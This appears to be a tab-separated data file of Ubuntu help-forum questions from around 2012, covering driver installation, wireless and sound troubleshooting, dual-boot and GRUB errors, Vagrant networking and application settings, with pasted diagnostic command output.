226597	nvidia graphic driver ( new to ubuntu )	i recently installed ubuntu 12.10 . i have no idea about this operating system so i would like to ask you a question . i have nvidia card in my laptop and i wanted to ask if i should install any driver mentioned in the `` additional drivers '' . i mentioned below all the options available in the `` additional drivers '' window and i do not know which option should i choose . would you please let me know which option is the most suitable for me ? by default option 3 is selected . using nvidia binary xorg driver , kernel module and vdpau library from nvidia-current ( propriatary , tested ) using experimental nvidia binary xorg driver , kernel module and vdpau library from nvidia-experimental-310 ( proprietary ) using x.org x server - nouveau display driver from xserver-xorg-video-nouveau ( open source ) using nvidia binary xorg driver , kernel module and vdpau library from nvidia-current-updates ( proprietary ) using experimental nvidia binary xorg driver , kernel module and vdpau library from nvidia-experimental-304 ( proprietary ) thanks a lot in advance . bye
226600	need to restart to detect wireless again , ( xubuntu 11.10 amd 32 bit )	my wireless connection tends to break from time to time . when that happens , there are no wireless networks displayed in network manager . wicd ca n't detect any either . the only thing i can do is to reboot and after that my wireless works until the next connection drop out . what i 've tried so far : using the hardware switch does n't work . if i try that even with a working connection , i ca n't unblock it without a restart . lshw -c network : *-network description : wireless interface product : ar242x / ar542x wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : wlan0 version : 01 serial : 00:1c:26 : cb : ed:7b width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath5k driverversion=3.0.0-28-generic firmware=n/a ip=192.168.198.101 latency=0 link=yes multicast=yes wireless=ieee 802.11bg resources : irq:19 memory : f0400000-f040ffff lspci : 05:00.0 ethernet controller : atheros communications inc. ar242x / ar542x wireless network adapter ( pci-express ) ( rev 01 ) tried this advice to reload the network driver , but it did n't help : $ sudo modprobe -r ath5k $ sudo modprobe ath5k also , sudo restart network-manager or sudo /etc/init.d/networking restart did n't help . dmesg | grep -i firmware lists some error even when my connection works : [ 24.771652 ] [ firmware bug ] : acpi ( z00p ) defines _dod but not _dos apparently brightness control has some problems too , i googled `` acer aspire 5520 has backlight broken '' . ( that 's my laptop ) anyway , i 'd appreciate if someone could help me to get the wireless to restart without a reboot .
226607	associating files with same mime but different file extensions to differentt applications	how can i associate files with same mime but different extensions to different applications . for example both .maff & .zip files have application/zip mime ; but i need to open .maff by firefox and .zip by archivemanager setting this via open with dialog associates application to mime that causes both files open with same application . how can i configure this in gnome ? i 'm using ubuntu lucid lynx . thanks
226610	gateway ip returns to zero	when you set a static ip under ubuntu 12.04.1 , you must supply the desired machine ip and the gateway ip , all using the network manager . when i first entered them and rebooted , everything worked great . on the second boot , however , firefox could find no web page . upon checking , i discovered that the gateway ip had returned to zero . now , no matter how often i resupply it , it returns to zero immediately after nm `` saves '' it : that is , appears as zero when redisplayed . the only way i can get to the internet is to restore dhcp operation . i need to use static ip for access to my home network . would appreciate any suggestion . -- robert smith
226612	linux kernel code coverage - gcov	i 'm trying to use some test scenarios from linux test project and get the kernel source code coverage . i 'm using gcov/lcov to do so . here are the things i have so far : gcov flags in the build config gcov-based kernel profiling config_gcov_kernel=y config_gcov_profile_all=y on linux kernel version : 2.6.32.60+drm33.26 after building the kernel i have all the .gcov files in the source folder gcov/lcov works when i use a source file as the input things that i should have but i don't /proc/gcov folder gcov kernel module ( gcov.o ? ) now what i want is to run the test scenarios and with lcov get which portion of linux kernel code has been used so far . but when i call lcov -c this is what i get even though all the build flags are ok. loading required gcov kernel module . lcov : error : can not load required gcov kernel module ! there is a kernel patch for < 2.6.30 and afterwards it is built in .
226613	how do i run dwarf fortress ?	i have downloaded dwarf fortress , and i believe i 've collected all the required files . however , when i click on the df file , it asks me some things , i click on `` run , '' and nothing happens . the game just does not open at all . i am running ubuntu 12.04 with gnome 3 on 64-bit . if i could get the game to open i am sure i could deal with the other problems that may occur . i am fairly new to ubuntu , and i have n't used linux since 2009 . most likely there are some files i do n't know about . running it in terminal : $ ./df ./libs/dwarf_fortress : error while loading shared libraries : libsdl_image-1.2.so.0 : can not open shared object file : no such file or directory
226614	ubuntu 12.10 ati driver 12.11 fails after compiz and xorg update	i updated my system via the package manager from unity and next restart was just blackness . after being here : http : //linux.hootip.com/amd-catalyst-12-11-beta-fix-and-installation-the-drivers-on-ubuntu-12-11/ i had the catalyst 12.11 beta driver installed . i checked my /var/log/apt/history.log and the update i received was of compiz and xorg packages . i tried to get latest release info , but all i get from their pages are commit info ; i ca n't tell what was n the package update i got served . anyone knows what was in the latest xorg/compiz release that broke the driver ? which driver should i use now ? for completeness this is how i got the system back to boot ( probably lame and not elegant ) : boot with grub selection `` more ubuntu options ( or sth like that ) , from secondary screen select 3.5.0-19 with boot options , when system prompts on stuff you 'd like to do , select `` root '' - drop to root shell , there : # mount -o remount , rw / # mv /etc/x11/xorg.conf /etc/x11/xorg.conf.failed # /usr/share/ati/fglrx-uninstall.sh # reboot this got be back on my feet .
226624	ca n't get wireless working after installing ubuntu 12.10 on acer aspire 5560-7414	i have been struggling all day trying different solutions from different posts on how to get my wifi working but none have worked . any help would be greatly appreciated . below are some wireless preferences to help find the problem . mark @ mark-aspire-5560 : ~ $ sudo rfkill list all [ sudo ] password for mark : 0 : acer-wireless : wireless lan soft blocked : no hard blocked : no 1 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no *-network description : ethernet interface product : netlink bcm57785 gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 10 serial : 20:6a:8a:7f:63:82 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi msix pciexpress bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.123 duplex=full firmware=sb ip=158.65.194.244 latency=0 link=yes multicast=yes port=twisted pair speed=10mbit/s resources : irq:16 memory : f0000000-f000ffff memory : f0010000-f001ffff memory : f0050000-f00507ff *-network description : wireless interface product : bcm43227 802.11b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth1 version : 00 serial : 08 : ed : b9:01 : e0:8b width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.100.82.112 latency=0 multicast=yes wireless=ieee 802.11bgn resources : irq:18 memory : f0100000-f0103fff
226625	how do i enter a sudo command when part of my password contains uppercase letters and numbers	part of my password contains numbers and uppercase letters . how can i know that i am correctly typing my password in a terminal when invoking sudo ? i am not very computer literate , so i would appreciate a simple explanation .
226626	modified shortcut resetted after update	i modified the `` minimise all windows '' shortcut from alt + super + d to super + d but everytimes there 's a unity update the shortcut is immediately resetted to it 's standard setting . is there a way to prevent this ?
226627	12.04 no sound - alc888 / radeon 3200hd	evening all . i have a msi u230 netbook , mv40 processor , 4gb ram with integrated ati radeon 3200hd grahics & an alc888 codec integrated soundcard . it has hdmi out as well . i 've tried a few distro 's and have been around linux for a short time . i reckon i 've settled on ubuntu 12.04 ( 32bit ) due to it doing pretty much everything i want it to . i 'm working with a fresh install right now . i recently re-installed when i was going in circles trying to solve my problem before . i install ubuntu and it works , except for the sound . i have tried things like reinstalling alsa , editing my asound.conf file , installing hda verb and a few other things . its at the point where i need to ask for help ... some outputs : ross @ ross : ~ $ aplay -l ** list of playback hardware devices ** card 0 : sb [ hda ati sb ] , device 0 : alc888 analog [ alc888 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : hdmi [ hda ati hdmi ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 ross @ ross : ~ $ uname -r 3.2.0-34-generic-pae ross @ ross : ~ $ lspci | grep vga 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati rs780m/rs780mn [ mobility radeon hd 3200 graphics ] ross @ ross : ~ $ lspci | grep audio 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) 01:05.1 audio device : advanced micro devices [ amd ] nee ati rs780 hdmi audio [ radeon hd 3000-3300 series ] added options snd-hda-intel position_fix=1 to alsa-base.conf file unmuted all in alsamixer can anyone suggest anything more ?
226628	vagrant : virtualbox : headless ubuntu : how to set up bridged networking ?	i am trying to set up a vagrant virtualbox ( v4.2.4 ) virtual machine with a ubuntu `` box '' which i got from www.vagrantbox.es . i was able to use vagrant to set it up as a headless box and start it , and then i was able to ssh locally into it ( using 127.0.0.1:2222 ) , connect the internet and sun a bunch of `` sudo apt-get '' commands to update it and install new software . i would like to be able to access this virtual machine on my network , so i need a bridged network adapter for the virtual box . when i went to the virtualbox console for this device , and tried to set up bridged networking , it said that i needed the `` guest additions '' . i tried to install them and i could n't get the .iso file for the guest additions . i went elsewhere on the 'net and it seems that i had to run `` sudo apt-get install virtualbox-guest-additions-iso '' from the virtual machine in order to get bridged networking . i tried this , and it installed fine after a couple of reboots . i then tried to set up bridged networking again ( virtualbox console to devices- > network adaptors ... ) but it did n't work . -- -- -- -- -- -- -- edit more clarification -- -- -- -- -- -- -- -- -- - my vagrantfile looks like this : # -*- mode : ruby -*- # vi : set ft=ruby : vagrant : :config.run do |config| config.vm.box = `` ubuntu1204 '' config.vm.box_url = `` http : //dl.dropbox.com/u/4031118/vagrant/ubuntu-12.04.1-server-i686-virtual.box '' config.vm.network : bridged end when i tried `` vagrant up '' , here is what i got : c : \users\jay\vagrantprojects\vagrant_guide > vagrant up [ default ] vm already created . booting if it 's not already running ... [ default ] clearing any previously set forwarded ports ... [ default ] forwarding ports ... [ default ] -- 22 = > 2222 ( adapter 1 ) [ default ] creating shared folders metadata ... [ default ] clearing any previously set network interfaces ... [ default ] preparing network interfaces based on configuration ... [ default ] booting vm ... [ default ] waiting for vm to boot . this can take a few minutes . [ default ] failed to connect to vm ! failed to connect to vm via ssh . please verify the vm successfully booted by looking at the virtualbox gui . c : \users\jay\vagrantprojects\vagrant_guide > vagrant ssh `vagrant ssh` is n't available on the windows platform . you are still able to ssh into the virtual machine if you get a windows ssh client ( such as putty ) . the authentication information is shown below : host : 127.0.0.1 port : 2222 username : vagrant private key : c : /users/jay/.vagrant.d/insecure_private_key i tried to ssh to the vm using putty.exe , but it would not let me in . so what do i need to do ? -- -- end edit -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- what , or what else do i need to do to set up bridged networking in this virtual machine ? i appreciate any help that i can get .
226631	unable to boot windows after installing ubuntu 12.04 - error : invalid efi file path	solved - see update 2 below ( but lost all files/programs on windows 7 ) i have a laptop ( asus x310a , i installed ubuntu 12.04 to be side by side with windows 7 but i seem to have gotten a problem with booting windows 7 . i used the boot repair twice with no results . boot-repair info : http : //paste.ubuntu.com/1417623/ the error i get when starting windows 7 from grub is : error : invalid efi file path in boot manager or menu , i have 3 options now : 2x for ubuntu ( maybe cause i did boot-repair twice ) 1x windows boot manager ( if i boot this it opens `` asus preload wizard '' , it gives me the option to re-install windows losing all previous data - ) when i was making the partition before installing ubuntu , i made the new partition by making sda4 smaller and adding ext4 mounted : `` \ '' and adding a swap area . installed it and it did n't work , nothing worked . so i booted ubuntu from the usb again and deleted the partitions i made and decided to make sda3 smaller and making the partitions but this time it gave me the option that i could mount sda3 on `` \windows '' or `` \dos '' i ignored it and did n't choose neither because the i know that it does n't need to be mounted and proceeded to create what is now sda7 ( ext4 ) and sda8 ( swap area ) . it still did n't work so i booted from usb and did the first boot-repair , so i was able to boot ubuntu now but not windows , but when i did it through my usb i was not able to update boot-repair , so i decided to redo the boot-repair from ubuntu running on the hardisk ( fully updated ) and it still did n't work . in grub this is what i see ( when booting using ubuntu as first option in boot menu ) : ubuntu , with linux 3.2.0-29-generic ubuntu , with linux 3.2.0-29-generic ( recovery mode ) windows uefi loader windows boot uefi bootx64.efi.bkp windows 7 ( loader ) ( on /dev/sda3 ) windows recovery environment ( loader ) ( on /dev/sda5 ) i tried all the ones starting with `` windows '' they all do n't work please help , many thanks update 1 i tried : menuentry `` windows 7 '' { insmod part_gpt insmod chain set root= ' ( hd0 , gpt1 ) ' chainloader /efi/microsoft/boot/bootmgfw.efi.bkp } '' window 7 '' appears in grub , and when i choose it , it asks if i want to start windows normally so i do and then i get a blue screen and then it returns me to grub update 2 so basically this is what we did , we choose `` windows uefi '' in grub and pressed f9 to go into `` asus preload wizard '' and basically choose the language and proceeded to re-install windows 7 essentially on the first partition ( sda3 ) , which is drive c : . we let it do its thing through diskpart.exe ( dos window , `` the black window '' ) - microsoft diskpart version 6.1.7601 it re-installed windows 7 , it then jumped to a windows 7 interface with large icons did some more installing and then jumped to asus - windows configuration loading screen then windows opened and then did some stuff and shutdown automatically . so i assumed that it needed a restart so i went back into `` windows uefi '' in grub and same things happened it did some updates then shutdown . so i cycled this maybe 10 times until in the end windows 7 at last worked ! ! ! so i went back to ubuntu 12.04 , everything was working fine , i opened gparted and deleted the partition : sda5 - ntfs - 1.00mio - bios_grub and resized sda4 ( drive 'd ' ) to use up the unused space went back to windows checked everything and i believe everything is fine now in terms of booting . but i lost all the files and programs installed on windows 7 . but i made a back up of all my files before installing ubuntu 12.04 , so i have them all . in terms of programs i will just have to re-install them . : )
226635	how do add a new line when an expression is found in a text file ?	i have the page source of a website but the links that i need are clumped together . how do i separate each link , one link per line , if they all start with href ?
226637	how to fix gtk theme ?	i have installed gnome-cupertino-gtk-theme from here http : //www.webupd8.org/2012/12/zukitwo-adwaita-cupertino-themes-ported.html on ubuntu 12.10 . in nautilus 3.4 , the collor of the toolbar is awful , it doesnt even match the window border , so how can i edit the theme to make the color of the toolbar be the same as the window border ? many thanks in advance
226638	how to eject a cd/dvd from the command line	i 've just right clicked on the dvd icon in the unity launcher in order to eject it , but instead of hitting the 'eject ' button , i missed and hit the 'unlock from launchpad ' option instead . how do i go about ejecting the disk from the drive now that the launcher option is missing ?
226644	e : sub-process /usr/bin/dpkg returned an error code ( 2 )	i 'm doing an upgrade with sudo apt-get upgrade after i press enter : do you want to continue [ y/n ] ? y dedconf : apt-extracttemplates failed : no such file or directory extracting templates from package : 100 % dpkg : error : parsing file '/var/lib/dpkg/status ' near line 1146 package 'python-minimal' 'break ' field , invalid package name 'python-de~ ' : character '~ ' not allowed ( only letters , digits and character '-+._ ' ) e : sub-process /usr/bin/dpkg returned an error code ( 2 ) how to fix or edit this ? ? ?
226645	what happened to the graphical policykit settings ?	back in 8.04 or so , when policykit was new , we had a gui `` browser '' that enabled us to easily decide things like whether a user should be allowed to shutdown the system when other users were logged in and if it should always be allowed or only while on the console , etc . then those things suddenly disappeared and though it seems policykit is still in use , i have n't been able to find any similar gui to actually configure the policies . what happened ?
226647	microsoft wireless mobile 4000 usb bluetrack mouse not working in ubuntu 12.04 ?	do you guys have any idea why my microsoft wireless 4000 usb mobile blue track mouse will not work with ubuntu 12.04 ? i have searched many forums and ca n't really find any usefull information . it 's what i used before i totally ditched windows and switched to linux , i have not used tis operating system that long so any help would be appreciated . thanks in advance .
226648	how do i install the drivers ? or how do i get them to list under `` additional drivers '' ?	so i go to system settings in ubuntu 12.10 and i want to install my drivers but under the additional drivers , my lan doesnt work , doesnt even pick up that im plugged in threw ethernet cord . i have a gtx 670m with 3gb gddr5 for a video card and would like to use that . just need help , pretty new to ubuntu . ok when i looked at that other question i did the sudo lspce -nn and this is what i got madmike @ mike-gt70 : ~ $ sudo lspci -nn 00:00.0 host bridge [ 0600 ] : intel corporation 3rd gen core processor dram controller [ 8086:0154 ] ( rev 09 ) 00:01.0 pci bridge [ 0604 ] : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port [ 8086:0151 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) 00:14.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb xhci host controller [ 8086:1e31 ] ( rev 04 ) 00:16.0 communication controller [ 0780 ] : intel corporation 7 series/c210 series chipset family mei controller # 1 [ 8086:1e3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 [ 8086:1e2d ] ( rev 04 ) 00:1b.0 audio device [ 0403 ] : intel corporation 7 series/c210 series chipset family high definition audio controller [ 8086:1e20 ] ( rev 04 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 1 [ 8086:1e10 ] ( rev c4 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 3 [ 8086:1e14 ] ( rev c4 ) 00:1c.4 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 5 [ 8086:1e18 ] ( rev c4 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 [ 8086:1e26 ] ( rev 04 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation hm77 express chipset lpc controller [ 8086:1e57 ] ( rev 04 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] [ 8086:1e03 ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 7 series/c210 series chipset family smbus controller [ 8086:1e22 ] ( rev 04 ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation device [ 10de:1213 ] ( rev ff ) 02:00.0 ethernet controller [ 0200 ] : atheros communications inc. device [ 1969 : e091 ] ( rev 13 ) 03:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 2230 [ 8086:0887 ] ( rev c4 ) 04:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5209 pci express card reader [ 10ec:5209 ] ( rev 01 ) 04:00.1 sd host controller [ 0805 ] : realtek semiconductor co. , ltd. rts5209 pci express card reader [ 10ec:5209 ] ( rev 01 ) let me know if anything else is needed .
226650	how can i tell if i 'm using llvmpipe ?	this question is directly based on a comment/question that can be read here . i have a netbook with a radeon x1200 series ( rs690m ) that 's using the radeon driver . unfortunately , i 'm experiencing serious graphical glitches that make my system unusable . here is a video i took for illustrative purposes . blacklisting the radeon driver only results in an incredibly slow desktop which is equally unusable . i tried doing what this question suggests to force llvmpipe to be used ( with or without the radeon driver blacklisted ) , but i experienced the exact same results . how can i tell if llvmpipe is being used in the first place ?
226659	going back to linux after a few years , 10.04 lts or 12.04 lts ? i intend on installing i3wm	the goal of this build is to be a quick and efficient build for programming . i like the look and functionality of i3wm . that being said , which version of ubuntu should i install ? 10.04 lts or 12.04 lts ? is 10.04 lacking anythiun
226662	having trouble installing netflix desktop app on ubuntu 12.04	i added the ppa by running these commands in the terminal : sudo apt-add-repository ppa : ehoover/compholio sudo apt-get update sudo apt-get install netflix-desktop now the microsoft end-user license agreement has popped up in the terminal , and i ca n't get it to go away and proceed with the install . what should i do ?
226664	ubuntu on macbookpro : how to get a support for 802.11a/n ( 5ghz ) with chip broadcom 4331 ?	i have been having problems with n mode . when i execute iwconfig get wlan0 ieee 802.11b/g and when i boot in mac os my wireless card info is : firmware version : broadcom bcm43xx 1.0 5.100.198.104.5 ) supported phy modes : 802.11 a/b/g/n and i am able to connect to n mode wireless network . but on ubuntu , this has been a problem for me when trying to connect to access point with phy mode n. after some research i found on the linux wireless documentation that 802.11a/n ( 5ghz ) modes and power management are not yet supported ht phy cards ( 4331 ) is there a way to get it to work ?
226668	ca n't install ubuntu 12.10 on asus x401u help needed	i have a sata with 320gb running windows 8 i am trying to dual boot . i tried installing it through a usb but received this message . executing 'grub-install /dev/sda2 ' failed . i tried using the original sda but i ca n't add to it . i have 82gb ready for ubuntu but every attempt to install it has failed . i have also tried installing it with the windows installer on the ubuntu website but nothing works.here is what the partitions look like , http : //imgur.com/jd03x http : //imgur.com/ksja1 any help would be appreciated if im being vague ask and i will try to answer .
226674	ca n't install skype in ubuntu 64 bit	i ca n't download skype , is skype currently not available for ubuntu linux 64bit 12.10 ? 1.dowload skype in official website 2.import canonical repo the following packages have unmet dependencies : skype : depends : skype-bin but it is no going to be installed this problem exists , what is skype-bin ? even i ca n't download it ( sudo apt-get install skype-bin e : package 'skype-bin ' has no installation candidate
226675	reinstall an ubuntu os ?	i installed a dual boot of ubuntu and windows 7 and my ubuntu os got corrupted , somehow over time i added 2 more ubuntu os 's . i understand i 'm a complete idiot and should n't have played around , but i looked it up on google and they said i could delete the partitions , so i tried . now my computer gives me a grub error , i tried my own obvious : i got my installation usb 's for ubuntu and tried to boot from them , but i got a grub error again on one usb and on my second usb i got a blank command prompt where i could n't type anything . i do n't care to get the data back , but i would like to be able to use it . i do n't care to recover any of my files for either windows 7 or ubuntu . i only care to get my computer back .
226677	ubuntu do n't detect my bluetooth device	i have a samsung series 5 book . ubuntu says `` no bluetooth adapter found '' . how can i fix this . im also suspecting that its because of my previous os , i turn the bluetooth off ( using the driver provided by the manufacturer for that os ) and forgot to turn it on before formatting to ubuntu . is there any way to turn bluetooth on in my case ? built-in bluetooth device does n't have a hard switch .
226685	how to type peso sign in ubuntu 12.04.1 ?	i 'm still can not figure out how to type a philippine peso sign in libreoffice and other application like tomboy note .
226692	showing 'network device not available ' in-spite of the fact that it is connected	whenever there is a problem with my connection , i mean whenever my connection goes down when my cable disconnects , ubuntu starts redialing the connection but after certian redials , it shows that network devices not available . and after that in-spite of connecting the wire again it does n't recognize the device and shows the same message.. ! ! someone please help ... thanks in advance..
226700	ubuntu installation through wubi on asus x401a with windows 8 pre-installed	it seems that after i ran wubi in windows 8 that everything was correctly installed . the problem i have is when i re-boot , windows loads some sort of boot manager that asks me what os i want to boot from . when i select ubuntu , i 'm getting error messages . here is what my screen says : windows failed to start . a recent hardware or software issue is the cause . to fix the problem : insert your windows installation disk and restart choose your language settings and then click `` next '' click repair your computer . file : \ubuntu\winboot\wubi1dr.mbr status : 0xc000007b this application or operating system could n't be - something , something ( ca n't read that part ) required file is missing or contains errors . so , is there something i can do to fix this ? or is this a hardware issue ? i 've searched the forums and ca n't find anything about this . i 've never done anything like this before so any help would be appreciated ! ! operating system : windows 8 64-bit ( 6.2 , build 9200 ) ( 9200.win8_gdr.121023-1503 ) language : english ( regional setting : english ) system manufacturer : asustek computer inc. system model : x401a1 bios : x401a1.211 processor : intel ( r ) pentium ( r ) cpu b980 @ 2.40ghz ( 2 cpus ) , ~2.4ghz memory : 4096mb ram available os memory : 3980mb ram page file : 1450mb used , 3232mb available windows dir : c : \windows directx version : directx 11 dx setup parameters : not found user dpi setting : using system dpi system dpi setting : 96 dpi ( 100 percent ) dwm dpi scaling : disabled dxdiag version : 6.02.9200.16384 64bit unicode
226701	downloadhelper firefox failed conv , ffpmeg program is deprecated	i 've tried to download videos from youtube and convert them using downloadhelper but the conversion fails . i opened ffpmeg on terminal and get the message `` * this program is deprecated * this program is only provided for compatibility and will be removed in a future release . please use avconv instead . '' i tried this and use avconv but the conversion still fails . i have vlc installed also , someone said it might help ... but it did n't = [
226705	is it possible to use ubuntu for android on a nexus 7 or is it just for the smaller mobile devices ?	just to clarify , i 'm not talking about running ubuntu instead of android on the nexus 7 but taking advantage of the ubuntu on android project using the nexus 7 . is it possible ? also , is it in the software center right now or is it not ready yet ?
226708	how do i change my monitor 's refresh rate ?	i have a nvidia lcd monitor . when i go to nvidia x server settings display configuration , there 's no listing there to change my lcd monitor from 60hz to 85hz which is the maximum setting my monitor allows .
226712	how to hide pidgin buddy list on startup ?	i 'm running ubuntu 12.10 . pidgin starts automatically on startup , but i want the buddy list window to starts minimized . i tried this : http : //www.cebuntu.com/apps/how-to-start-pidgin-and-minimized-on-startup-in-ubuntu/ and this shell script : http : //planet.jboss.org/post/how_to_start_pidgin_minimized_or_always_start_pidgin_with_its_buddy_list_invisible but none of them work . i mean they work , the buddy list is minimized on startup , but after that , i ca n't open it , looks like it is forced to be minimized . is there any working solution ? i found the solution : first , install devilspie sudo apt-get install devilspie make a new file called pidgin.ds in /home/username/.devilspie : ( if ( is ( window_name ) `` buddy list '' ) ( begin ( minimize ) ) ) add devilspie to launchpad . done !
226713	totem losing sound after a few seconds of playing	after starting totem in ubuntu 12.10 ( playing an .mts file ) , it starts out playing just fine , but after about 3 seconds the sound goes away . no clue at all what is happening . .mpg files play just fine . the videos play just fine , with sound , in vlc . edit : pausing the video and then starting again brings sound back for about one second , and then the sound fades again .
226722	wireless tethering problem on ubuntu 12.04	i 'm trying to access the internet on my laptop using wireless tethering option on my android phone . i 'm able to make dns queries and also ping my gateway but i 'm neither able to ping other sites like www.google.com nor access internet . here is the output of some commands that might help in resolving the issue , itachi @ itachi-laptop : ~ $ uname -a linux itachi-laptop 3.2.0-34-generic # 53-ubuntu smp thu nov 15 10:49:02 utc 2012 i686 i686 i386 gnu/linux itachi @ itachi-laptop : ~ $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.1 lts '' itachi @ itachi-laptop : ~ $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.43.1 0.0.0.0 ug 0 0 0 wlan0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 wlan0 192.168.43.0 0.0.0.0 255.255.255.0 u 2 0 0 wlan0 itachi @ itachi-laptop : ~ $ ping 192.168.43.1 ping 192.168.43.1 ( 192.168.43.1 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.43.1 : icmp_req=1 ttl=64 time=1.96 ms 64 bytes from 192.168.43.1 : icmp_req=2 ttl=64 time=1.99 ms 64 bytes from 192.168.43.1 : icmp_req=3 ttl=64 time=2.00 ms ^c -- - 192.168.43.1 ping statistics -- - itachi @ itachi-laptop : ~ $ ping www.google.com ping www.google.com ( 74.125.236.84 ) 56 ( 84 ) bytes of data . ^c -- - www.google.com ping statistics -- - 40 packets transmitted , 0 received , 100 % packet loss , time 39313ms itachi @ itachi-laptop : ~ $ lspci -nnk | grep -ia2 net 0c:00.0 network controller [ 0280 ] : intel corporation pro/wireless 4965 ag or agn [ kedron ] network connection [ 8086:4229 ] ( rev 61 ) subsystem : intel corporation device [ 8086:1120 ] kernel driver in use : iwl4965 itachi @ itachi-laptop : ~ $ ifconfig wlan0 wlan0 link encap : ethernet hwaddr 00:21:5c:6a:3d:11 inet addr:192.168.43.224 bcast:192.168.43.255 mask:255.255.255.0 inet6 addr : fe80 : :221:5cff : fe6a:3d11/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:439 errors:0 dropped:0 overruns:0 frame:0 tx packets:3994 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:64469 ( 64.4 kb ) tx bytes:427656 ( 427.6 kb ) i 'm able to access the internet when i directly connect via a usb-dongle and that is why i 'm posting this question . when i try using wifi tethering though , i 'm unable to ping nor access internet . any help to resolve this issue would be much appreciated . thanks .
226728	wubi installed twice ( without uninstalling the first ) , now i ca n't remove the second	wubi installed twice ( without uninstalling the first ) , now i ca n't remove the second so , i uninstalled ubuntu from program files on windows 8 . but , i originally installed ubuntu twice accidentally . wubi did n't uninstall completely , so windows 8 's boot manager is telling me that i still can boot into ubuntu even though i have deleted all files ( i think ) that wubi installed . what can i do to remove or fix this ?
226735	ca n't access any storage devices on 12.10	hi i 've just started using ubuntu 12.10 ( today ! ) my first time with any non-windows os . i wanted to retrieve some files after windows stopped working . i boot ubuntu from a usb and it seems to work fine - i can access the internet etc . but i ca n't access any of my drives or even a usb drive . the error i get is '' adding read acl for uid 999 to `/media/ubuntu ' failed : operation not supported '' any help much appreciated : )
226737	asus ux42vs brightness control key fn+5 , fn+6 does not work	i have installed on my notebook asus ux42vs ubuntu 12.10 all fn keys seems to work fine , but brightness keys does not work . i 've tried to config it usiong this question why are the screen brightness keys on my asus n56vz not working ? but it not solve the problem
226739	is it possible to use my real graphic card on a virtual machine ?	i am asking this question because i 'm just curious . when i install a virtual machine by using virtual box or vmware , is it use my real graphical card ? if not , is it possible to use it on a virtual machine ?
226741	acer aspire microphone issue	i have got an acer aspire 7750g : more info it has been running ubuntu since i bought the laptop ( 12.10 as of now ) , but a few updates ago , i lost my microphone . it does n't recognise the internal mic or the mic jack ( although alsa seems to recognise it ) . i have been looking around , and i fixed it , but this was only temporary , after a reboot my mic was gone again . i have n't been able to find the fix , so i wanted to know whatever you guys know what i have to do to fix this . result of aplay -l : **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : alc269vb analog [ alc269vb analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : generic [ hd-audio generic ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 [ edit ] : i just noticed that unplugging the mic works . restart ing pulse or anything doesnt work , but replugging the mic works ... .. strange . but i dont want to replug the mic everytime i boot . thanks in advance . ps i am reading that many people are encountering this issue ...
226744	how do i alter/customize the grub boot menu for ubuntu 12.10 ?	i use a shared computer , so i need to make it user friendly for my-less-than-computer-knowledgable friend currently have ubuntu 12.10 installed i would like to change the grub menu so that windows 7 is at the top of the list ( thus allowing the automatic timeout to automatically select it on startup ) and ubuntu down below i 've already used the information used at { how do i change the grub boot order ? } and that did n't work .
226745	how to set default applications non-interactively ( e.g . vlc as default for video ) ?	it 's straightforward to set vlc as default using the gui , but straightforward does n't mean easy ( i have to do the same thing over and over many times each time i install a new system ) . i just need a short command for this ( e.g . set a gconf or dconf key ) . please no answers like right-click and select properties .
